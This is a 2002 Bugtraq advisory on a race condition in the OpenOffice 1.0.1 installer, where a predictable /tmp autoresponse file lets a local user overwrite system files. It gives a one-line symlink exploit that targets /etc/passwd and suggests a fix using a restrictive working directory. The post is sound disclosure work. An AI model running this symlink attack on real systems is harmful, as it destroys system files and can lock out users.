Bugtraq mailing list archives
OpenOffice 1.0.1 Race condition during installation.
From: "Larry W. Cashdollar" <lwc () vapid ath cx>
Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
Vapid Labs Larry W. Cashdollar 9/9/02 Summary: OpenOffice 1.0.1 Race condition during installation can overwrite system files. Severity: Low Description: A very simple and easy to exploit race condition exist during the installation of OpenOffice. During this window a malicous user could create a symlink in /tmp and overwrite arbitrary files. Exploit: As a normal user: lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf Where $USERNAME is the installer account name, probably root. will result in the password file being over written with: # create the proper autoresponse file cat << EOF > /tmp/${USER}_autoresponse.conf [ENVIRONMENT] INSTALLATIONMODE=$installtype INSTALLATIONTYPE=STANDARD DESTINATIONPATH=$prefix/$oo_home OUTERPATH= LOGFILE= LANGUAGELIST=<LANGUAGE> [JAVA] JavaSupport=preinstalled_or_none EOF Fix: Create a directory under /tmp to work from. With restrictive permissions. References: http://www.openoffice.org/dev_docs/source/1.0.1/index.html Larry W. Cashdollar lwc () vapid ath cx http://vapid.ath.cx
Current thread:
- OpenOffice 1.0.1 Race condition during installation. Larry W. Cashdollar (Oct 11)